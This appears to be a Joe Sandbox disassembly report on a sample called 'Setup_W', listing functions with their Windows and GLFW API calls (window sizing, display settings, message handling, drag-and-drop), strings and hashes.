Opcode ID: c7f8273961d225fd38aede5d6497c9046fdab4805ab1734fc49a8b91e6c22d21
Instruction ID: 56b1b2e10414c6ed154da36c08ccab621a88ac399964cde2fba271c26f532041
Opcode Fuzzy Hash: c7f8273961d225fd38aede5d6497c9046fdab4805ab1734fc49a8b91e6c22d21
Instruction Fuzzy Hash: 07E13B70A04308CFDB18DFA9CA8469EBBF0FF55B14F00CA2AE5959B295D774A845CF42

Function 6460C9BA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 241COMMON

Download Yara Rule

APIs

GetDpiForWindow.USER32 ref: 6460CA41

Part of subcall function 6460B0A6: SetThreadExecutionState.KERNEL32(00000000), ref: 6460B0C0
Part of subcall function 6460B0A6: SystemParametersInfoW.USER32 ref: 6460B10C
Part of subcall function 6460B0A6: SystemParametersInfoW.USER32 ref: 6460B130

GetWindowLongW.USER32 ref: 6460CB3B
SetWindowLongW.USER32(00000150,00000150), ref: 6460CB6D
GetMonitorInfoW.USER32 ref: 6460CB8A
SetWindowPos.USER32 ref: 6460CCFA

Strings

(, xrefs: 6460CB1C

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Window$Info$LongParametersSystem$ExecutionMonitorStateThread
String ID: (
API String ID: 3930307586-3887548279
Opcode ID: a0b1703c8ad3a84b37a9c2016ad01ebaa5baa3a88112c1f9bea6dd6591bf6aea
Instruction ID: ce95d183200969ec0ec3218b39cb76092ca63e45640ddd5fc6678acc3372c675
Opcode Fuzzy Hash: a0b1703c8ad3a84b37a9c2016ad01ebaa5baa3a88112c1f9bea6dd6591bf6aea
Instruction Fuzzy Hash: FAA107B0A083059FDB08EF69D98468EBBF0EF88714F10C92DE89997355D774D905CB92

Function 64608F9B Relevance: 18.1, APIs: 12, Instructions: 76COMMON

Download Yara Rule

APIs

UnregisterDeviceNotification.USER32 ref: 64608FAD
DestroyWindow.USER32(?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024,?,646030E9), ref: 64608FC0
SystemParametersInfoW.USER32 ref: 64608FEC
free.MSVCRT ref: 64608FFD
free.MSVCRT ref: 6460900A
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 6460902A
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 6460903D
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609050
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609063
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609076
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609089
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 6460909C

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: FreeLibrary$free$DestroyDeviceInfoNotificationParametersSystemUnregisterWindow
String ID:
API String ID: 1825173338-0
Opcode ID: 2620f4bd462751bdfb449cd6c85e89dfec4eb0bc9c2ab9ee5f2462bb2a1826d7
Instruction ID: 4751eaf6b87ea121d633ef41e038374e24d4eed0c9cabd56117908b4e63011e8
Opcode Fuzzy Hash: 2620f4bd462751bdfb449cd6c85e89dfec4eb0bc9c2ab9ee5f2462bb2a1826d7
Instruction Fuzzy Hash: FA31DAB0608381DFEF15BFBACA88A1ABBE8FB15645F01A86CE495C7240DB75D540CB51

Function 646094CB Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

,, xrefs: 6460955C

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: callocstrcpy
String ID: ,
API String ID: 2080364334-3772416878
Opcode ID: e0acfc1956907b1c726e3272f1f290c9dcdf92ef1be015e6eb987ec471acdd50
Instruction ID: 2166c0fec8160fdcf23276cbfbda69153d91a4fbb368ab464f647e45cf49f8a2
Opcode Fuzzy Hash: e0acfc1956907b1c726e3272f1f290c9dcdf92ef1be015e6eb987ec471acdd50
Instruction Fuzzy Hash: EBC1E3B49087589FDB55DF29C98469ABBF1BF89704F00C99EE98897300D734DA85CF82

Function 64610920 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 173COMMON

Download Yara Rule

Strings

,cd, xrefs: 64610A91
,cd, xrefs: 6461099A
,cd, xrefs: 64610B78
,cd, xrefs: 64610B67
,cd, xrefs: 64610B30
,cd, xrefs: 6461097C
,cd, xrefs: 646109C1
,cd, xrefs: 646109E3
,cd, xrefs: 64610B35

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID:
String ID: ,cd$,cd$,cd$,cd$,cd$,cd$,cd$,cd$,cd
API String ID: 0-339892999
Opcode ID: 0fa4d00ea122b1a81e076fd873fa0560f6a889ced63be3d20f07704dc0228682
Instruction ID: 1ddd88567b8f70bbd00b5d5b2014a53fbbc7393fae63a5ad54a31b5f61634dc3
Opcode Fuzzy Hash: 0fa4d00ea122b1a81e076fd873fa0560f6a889ced63be3d20f07704dc0228682
Instruction Fuzzy Hash: 6A51CD75A082518BDF11CF2DD88068AB7F1FF9B708F11AA2AE944AB715D730E915CBC1

Function 6460A81D Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6460A79F: EnumDisplaySettingsW.USER32 ref: 6460A7DC

ChangeDisplaySettingsExW.USER32 ref: 6460A8D5

Strings

Unknown error, xrefs: 6460A92B
Graphics mode not supported, xrefs: 6460A902
Invalid parameter, xrefs: 6460A90C
Computer restart required, xrefs: 6460A930
, xrefs: 6460A8AC
The system uses DualView, xrefs: 6460A8EE
Failed to write to registry, xrefs: 6460A920
Graphics mode failed, xrefs: 6460A916
Invalid flags, xrefs: 6460A8F8

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: DisplaySettings$ChangeEnum
String ID: $Computer restart required$Failed to write to registry$Graphics mode failed$Graphics mode not supported$Invalid flags$Invalid parameter$The system uses DualView$Unknown error
API String ID: 1333101904-1192658212
Opcode ID: af2ca54787bd583f984551b9cf1532fd2189e3493a595e00c5430dd22ef789bb
Instruction ID: b7b648b479718ed1ff53332b7b2a45aaa3563233a014b2ba000b28bcd7754222
Opcode Fuzzy Hash: af2ca54787bd583f984551b9cf1532fd2189e3493a595e00c5430dd22ef789bb
Instruction Fuzzy Hash: FC3192B0A043448BCB14CF69C58079EBBF0EFA5768F50CA69E4A9DB390E330D4468F42

Function 6460B26A Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 134windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 6460B2F3
CreateDIBSection.GDI32 ref: 6460B331
ReleaseDC.USER32 ref: 6460B34D
CreateBitmap.GDI32 ref: 6460B393
CreateIconIndirect.USER32 ref: 6460B454
DeleteObject.GDI32 ref: 6460B466
DeleteObject.GDI32 ref: 6460B472
DeleteObject.GDI32 ref: 6460B3C4

Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357

Strings

|, xrefs: 6460B2A1

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: CreateDeleteObject$BitmapByteCharErrorFormatIconIndirectLastMessageMultiReleaseSectionWide
String ID: |
API String ID: 2799049117-2343686810
Opcode ID: 22af9852c379c4d7575f55b8b7632cb9953961f2187284d3f79cbcae83d118f1
Instruction ID: e6dfc101f53f0bffcb151d90b53f43c180f82b0aa41017cfdc907e9a12dc0c54
Opcode Fuzzy Hash: 22af9852c379c4d7575f55b8b7632cb9953961f2187284d3f79cbcae83d118f1
Instruction Fuzzy Hash: B851FF70908318CFEB25DF69C984B9ABBF0AF4A704F00C4ADD98897340D7759A88CF52

Function 6460B6B7 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 6460B6D6
GetClientRect.USER32 ref: 6460B6FB

Part of subcall function 6460877D: VerSetConditionMask.KERNEL32 ref: 646087DA
Part of subcall function 6460877D: VerSetConditionMask.KERNEL32 ref: 646087F6
Part of subcall function 6460877D: VerSetConditionMask.KERNEL32 ref: 64608812
Part of subcall function 6460877D: RtlVerifyVersionInfo.NTDLL ref: 64608830

GetDpiForWindow.USER32(00000000), ref: 6460B725
AdjustWindowRectEx.USER32(00000000,00000000), ref: 6460B770
ClientToScreen.USER32 ref: 6460B78C
ClientToScreen.USER32(00000000,00000000), ref: 6460B7A0
SetWindowLongW.USER32 ref: 6460B7B9
SetWindowPos.USER32 ref: 6460B7FB

Strings

4, xrefs: 6460B7CD

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Window$ClientConditionMask$LongRectScreen$AdjustInfoVerifyVersion
String ID: 4
API String ID: 4217418125-4088798008
Opcode ID: 17d7b0196edb0bd78542e89de870a9565de9d450f6f0fc7354a5d8e53f1302dc
Instruction ID: 72991660b5e62e9fb88cc883b23a07306cfc7d732dec7a01ff09eadeeccb0505
Opcode Fuzzy Hash: 17d7b0196edb0bd78542e89de870a9565de9d450f6f0fc7354a5d8e53f1302dc
Instruction Fuzzy Hash: CE41D8B1A083059FCB04EF69C58869EBBF8EF89714F00892DE898D7345DB749844CF92

Function 6460BB1B Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 66registryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,64633B3C), ref: 6460BB53
LoadCursorW.USER32 ref: 6460BB68
GetModuleHandleW.KERNEL32(?,?), ref: 6460BB81
LoadImageW.USER32 ref: 6460BBB5
LoadImageW.USER32 ref: 6460BBF0
RegisterClassExW.USER32 ref: 6460BBFE

Strings

0, xrefs: 6460BB2F
#, xrefs: 6460BB3E

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Load$HandleImageModule$ClassCursorRegister
String ID: #$0
API String ID: 1994909298-310112417
Opcode ID: 3bf254766e993e564a9534fe4bc37f7a9f591acf426d663c3deffeccc9797147
Instruction ID: 8833cee7edfb7f9070425f7573ad03eaceadb5a558f22546ce01d072ee062e0d
Opcode Fuzzy Hash: 3bf254766e993e564a9534fe4bc37f7a9f591acf426d663c3deffeccc9797147
Instruction Fuzzy Hash: F121EAB0808344DBEB01AFA5D95879EBBF4FF88705F00991DE59897240DBB989488B92

Function 64610780 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124filememoryCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 646107AF
vfprintf.MSVCRT ref: 646107CF
abort.MSVCRT ref: 646107D4
VirtualQuery.KERNEL32 ref: 64610867
VirtualProtect.KERNEL32 ref: 646108BD
GetLastError.KERNEL32 ref: 646108CA

Strings

@, xrefs: 646108AE

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
String ID: @
API String ID: 1616349570-2766056989
Opcode ID: fdae55f44df54ad847873b0df73a4e3f268ce5ee9adb76a092a9394e43f13077
Instruction ID: 9e0d6672c3fcfc9b39a93dd72e7bd94e9e8b2bda23d8cb2d541a2a85f03da3ec
Opcode Fuzzy Hash: fdae55f44df54ad847873b0df73a4e3f268ce5ee9adb76a092a9394e43f13077
Instruction Fuzzy Hash: 8C4137B190C3419FDB11EF29C48565EFBE0FF96358F51892EE8988B214E734E854CB92

Function 6460DEEC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 111windowkeyboardCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 6460DF1B
TranslateMessage.USER32 ref: 6460DF47
DispatchMessageW.USER32 ref: 6460DF51
GetActiveWindow.USER32 ref: 6460DF5A
GetPropW.USER32 ref: 6460DF73
GetKeyState.USER32 ref: 6460DFA7

Strings

`:ad, xrefs: 6460DF84

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Message$ActiveDispatchPeekPropStateTranslateWindow
String ID: `:ad
API String ID: 1098235094-94877694
Opcode ID: 6b4daecc32117496cb22e13426dffc7ea040e6c427d3d38e188f9edf3e98030c
Instruction ID: 893a9ba0832886e63f4c01581edf47c081ddb0a9f75bb26455985c2c0c5d4a68
Opcode Fuzzy Hash: 6b4daecc32117496cb22e13426dffc7ea040e6c427d3d38e188f9edf3e98030c
Instruction Fuzzy Hash: D24187B1908385DBDB04AFA6C5846AEBBF5FF44B10F00D82DE8959B201DB70D888CB52

Function 64602D50 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

glfwDestroyWindow.GLFW.4281411633(?,?,00000001,64613040,64633024,?,646030E9), ref: 64602D75
glfwDestroyCursor.GLFW.4281411633(?,?,00000001,64613040,64633024,?,646030E9), ref: 64602D88
free.MSVCRT ref: 64602DC4
free.MSVCRT ref: 64602DE5
free.MSVCRT ref: 64602E2B

Strings

;cd, xrefs: 64602D51
0cd, xrefs: 64602E18

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: free$Destroyglfw$Cursor.Window.
String ID: 0cd$ ;cd
API String ID: 2442548815-1884057578
Opcode ID: 341a6af4c31061e3084781ecad43557952b8b93f01e5a17f2d00a79e995cda9f
Instruction ID: 9aad1b5e57044b7d2b94080ccc180e97156aa84a46e9e744f830eeb9d27d8246
Opcode Fuzzy Hash: 341a6af4c31061e3084781ecad43557952b8b93f01e5a17f2d00a79e995cda9f
Instruction Fuzzy Hash: 4121A7706087908BFB15AF6AC294799BBE4FF15B44F40A92ED5808BB80DB35DCC48B56

Function 646064FA Relevance: 12.1, APIs: 8, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a3dd7ca98561c705222fd88babd9a87f93af03a2b099b42f0238ef1699d099
Instruction ID: e9857d6c81e66214a173a1493ea557c90cea33299e3cb8046c12e10172541d74
Opcode Fuzzy Hash: 10a3dd7ca98561c705222fd88babd9a87f93af03a2b099b42f0238ef1699d099
Instruction Fuzzy Hash: 9B412BB0518781DFEB16DF6ACA8076AB7F4EB56B04F01A41CE48493608E7B5C884DF5A

Function 6460B89F Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765

CreateRectRgn.GDI32(00000000), ref: 6460B90B
GetWindowLongW.USER32 ref: 6460B95B
SetWindowLongW.USER32 ref: 6460B97D
SetLayeredWindowAttributes.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6460B9A7
DeleteObject.GDI32 ref: 6460B9B3
GetWindowLongW.USER32(00000000), ref: 6460B9CD
SetWindowLongW.USER32 ref: 6460B9EF
RedrawWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6460C8D5,00000000,00000000), ref: 6460BA19

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Window$Long$ConditionMask$AttributesCreateDeleteInfoLayeredObjectRectRedrawVerifyVersion
String ID:
API String ID: 612219794-0
Opcode ID: 5d7e6b9cc34daab646a0d86b1bc3fc4d1a29992f629cdd476340fd9e23b7a474
Instruction ID: 44e4981ab1a89db8cfa399fa1c146b8c8643086fc116cd7b941efe6b6b07ab75
Opcode Fuzzy Hash: 5d7e6b9cc34daab646a0d86b1bc3fc4d1a29992f629cdd476340fd9e23b7a474
Instruction Fuzzy Hash: A541C8B1509706DFDB10AF69C64879EBBF4EF45725F00CA2CE8A88B281DB749444CF52

Function 6460DD8F Relevance: 12.1, APIs: 8, Instructions: 81fileCOMMON

Download Yara Rule

APIs

DragQueryFileW.SHELL32 ref: 6460DDAF
calloc.MSVCRT ref: 6460DDC6
DragQueryPoint.SHELL32 ref: 6460DDDA
calloc.MSVCRT ref: 6460DE36

Part of subcall function 6460844C: WideCharToMultiByte.KERNEL32 ref: 64608499

free.MSVCRT ref: 6460DE70
free.MSVCRT ref: 6460DE98
free.MSVCRT ref: 6460DEA2
DragFinish.SHELL32 ref: 6460DEAD

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
